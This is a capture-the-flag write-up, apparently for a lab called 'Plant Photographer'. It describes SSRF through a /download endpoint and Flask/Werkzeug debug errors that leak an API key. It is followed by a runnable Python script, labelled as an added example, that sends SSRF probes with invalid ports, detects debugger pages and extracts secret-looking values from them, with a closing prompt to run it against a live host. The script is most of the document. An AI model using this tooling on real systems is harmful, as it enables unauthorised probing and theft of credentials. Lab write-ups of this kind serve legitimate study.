Plant Photographer

  • I enumerated the website and found a Download Resume button on the homepage.

  • I viewed the source code of the website.

  • The Download Resume button was calling a /download API endpoint to fetch the file. I could use this to carry out an SSRF attack on the target.

  • I tried using a custom script hosted on my machine via SSRF but failed to do so. I tinkered around with the endpoint and triggered error messages to learn more about the infrastructure being used in the backend.

  • While I was conducting manual enumeration, Gobuster was running a directory scan on the target. The following subdirectories were found.

  • The admin page gave the following error.

  • The console page was locked behind a PIN.

  • I viewed its page source and found the following.

  • I didn't really understand its significance here, or whether it could be of any use to me, but I still took note of it.

  • Next, I kept working the /download endpoint and triggered a pycurl error by modifying the port to an invalid value.

  • This revealed that the website was running Python's Flask framework in the backend. I looked through the errors and found the following.

  • The API Key was left in the open and hence the first flag was obtained. This was easy.

  • The next objective was to gain access to the admin portal.
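What the error-triggering step on the /download endpoint above amounts to in code, as an added example (this is not the write-up's own tooling): a small Python probe that points the fetcher at an invalid port, recognises the Werkzeug debugger page in the response, fingerprints the backend from the traceback, and scans the rendered source lines for secret-looking assignments such as an API key. The `url` parameter name on /download, the `target.example` host and the embedded traceback HTML are assumptions constructed for the demo; the page does not show any of them.

```python
"""Probe a suspected SSRF endpoint and mine a Werkzeug/Flask debug
traceback for leaked secrets.

Added example, not the original write-up's code.  Assumptions (not on
the page): /download takes the fetch target in a `url` query parameter,
and the error page is the stock Werkzeug debugger HTML.  SAMPLE_TRACEBACK
below is constructed for the demo, not captured from a real target.
"""
import html
import re
import urllib.error
import urllib.parse
import urllib.request

# Ports a URL parser or libcurl rejects; each is a cheap way to make the
# backend raise (and, in debug mode, dump a traceback) instead of fetching.
INVALID_PORTS = (0, 65536, 99999, -1, "abc")

# Assignments whose value is worth flagging if they appear in traceback source.
SECRET_NAME_RE = re.compile(
    r"\b([A-Za-z_]*(?:API_KEY|SECRET|TOKEN|PASSWORD)[A-Za-z_]*)\s*=\s*['\"]([^'\"]+)['\"]"
)


def build_probe_url(base, host, port, scheme="http"):
    """Build the /download request that points the server-side fetcher at host:port."""
    target = f"{scheme}://{host}:{port}/"
    return f"{base.rstrip('/')}/download?url={urllib.parse.quote(target, safe='')}"


def _plain_text(body):
    """Strip tags and HTML entities so regexes see the traceback as text."""
    return html.unescape(re.sub(r"<[^>]+>", " ", body))


def is_werkzeug_debugger(body):
    """True when the response is the Werkzeug debugger page rather than a file."""
    return "Werkzeug Debugger" in body and "Traceback" in body


def backend_fingerprint(body):
    """Return the raised exception type and which known components appear in the trace."""
    text = _plain_text(body)
    exc = re.search(r"\b([A-Za-z_][\w.]*(?:Error|Exception|error))\b(?=:)", text)
    stack = sorted(m for m in ("flask", "werkzeug", "pycurl") if m in text.lower())
    return {"exception": exc.group(1) if exc else None, "stack": stack}


def extract_leaked_secrets(body):
    """Return {name: value} for secret-looking assignments shown in the traceback source."""
    return {name: value for name, value in SECRET_NAME_RE.findall(_plain_text(body))}


def probe(base, host="127.0.0.1"):
    """Live version: try each invalid port and return the first debug traceback seen."""
    for port in INVALID_PORTS:
        req = urllib.request.Request(build_probe_url(base, host, port))
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                body = resp.read().decode(errors="replace")
        except urllib.error.HTTPError as e:  # debugger pages come back as HTTP 500
            body = e.read().decode(errors="replace")
        if is_werkzeug_debugger(body):
            return port, body
    return None, None


# Constructed sample of what a Werkzeug debug page looks like once the
# fetcher chokes on an out-of-range port.  Paths and the key are made up.
SAMPLE_TRACEBACK = """<!doctype html><title>pycurl.error // Werkzeug Debugger</title>
<div class="traceback"><h1>pycurl.error</h1>
<div class="source">
<pre class="line before">API_KEY = &quot;CONSTRUCTED-EXAMPLE-KEY-0000&quot;</pre>
<pre class="line before">c = pycurl.Curl()</pre>
<pre class="line current">c.perform()</pre>
</div>
<div class="plain"><pre>Traceback (most recent call last):
  File &quot;/usr/lib/python3/dist-packages/flask/app.py&quot;, line 2464, in __call__
  File &quot;/app/app.py&quot;, line 42, in download
    c.perform()
pycurl.error: (3, 'Port number out of range')</pre></div>
</div>
"""

if __name__ == "__main__":
    print(build_probe_url("http://target.example/", "127.0.0.1", 99999))
    print(backend_fingerprint(SAMPLE_TRACEBACK))
    print(extract_leaked_secrets(SAMPLE_TRACEBACK))
```

Run `probe("http://target.example")` against a live host to get the real body, then feed it to `backend_fingerprint` and `extract_leaked_secrets`; the tag stripping in `_plain_text` keeps the regexes independent of which Werkzeug version rendered the frame source.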
